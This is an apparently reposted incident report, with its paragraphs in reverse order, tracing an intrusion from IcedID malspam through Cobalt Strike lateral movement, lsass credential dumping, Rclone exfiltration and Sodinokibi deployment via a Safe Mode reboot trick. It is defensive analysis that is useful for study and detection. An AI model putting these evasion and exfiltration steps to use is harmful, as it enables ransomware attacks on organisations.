![]() ![]() Encryption did not start immediately after reboot but required a user to log in, which in this case the threat actors completed by logging in after the reboot.īooting into Safe Mode with Networking blocked the startup of security tools and other management agents. After that, the threat actors used RDP to open a cmd or PowerShell process to then execute the Sodinokibi ransomware using a particular flag -smode, which when executed, wrote a couple RunOnce registry keys and then immediately rebooted the system into Safe Mode with Networking. They staged the ransomware executable on a domain controller and then used BITSAdmin to download it to each system in the domain. Three and a half hours into the intrusion, the threat actors used Rclone masquerading as a svchost executable to collect and exfiltrate the contents of network shares for use in a double extortion demand.Īt the four hour mark, the threat actors began to move on to final objectives. ![]() After completing these tasks the threat actors began to establish RDP connections between various systems in the domain. After discovery was completed, credentials were dumped from lsass. ![]() The attackers were slightly slowed down by AntiVirus, which ate a couple Beacons but the attackers eventually bypassed it using a variation of their lateral movement technique.Īdditional discovery was executed from the domain controller using AdFind and the Ping utility to test connections between the domain controller and other domain joined systems. It appears the threat actors wanted us to believe Exchange was the source of attack as they pivoted through Exchange to other systems in the domain using Cobalt Strike.Īfter compromising the Exchange server, the attackers moved to domain controllers and other systems within the environment using SMB and PowerShell Beacons executed via a remote service. We did not see the attackers interact with the Exchange application at all and at first, it appeared the attack came from Exchange, but after careful review, we assessed the source was indeed IcedID. Once the Cobalt Strike Beacons were established, lateral movement began, first to an Exchange server, then pivoting to other servers. About an hour and a half after initial access, the malware pulled down Cobalt Strike Beacons from 2 different command and control servers, which were both used through-out the intrusion. Persistence was setup using a scheduled task and discovery commands were initiated from the malware within minutes of execution. In our intrusion, the threat actors leveraged malicious spam using an xlsm document which, upon opening and enabling the macro, initiated a wmic command to execute the IcedID trojan from a remote executable posing as a GIF image. The IcedID trojan was first discovered in 2017 and currently operates as an initial access broker for several ransomware families. During the intrusion the threat actors escalated privileges to Domain Administrator, exfiltrated data, and used Sodinokibi to ransom all domain joined systems. In March, we observed an intrusion which started with malicious spam that dropped IcedID (Bokbot) into the environment and subsequently allowed access to a group distributing Sodinokibi ransomware. The ransomware family was purported to be behind the Travelex intrusion and current reports point to an attack against Acer for a reported $50 million ransom demand. Sodinokibi (aka REvil) has been one of the most prolific ransomware as a service (RaaS) groups over the last couple years.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |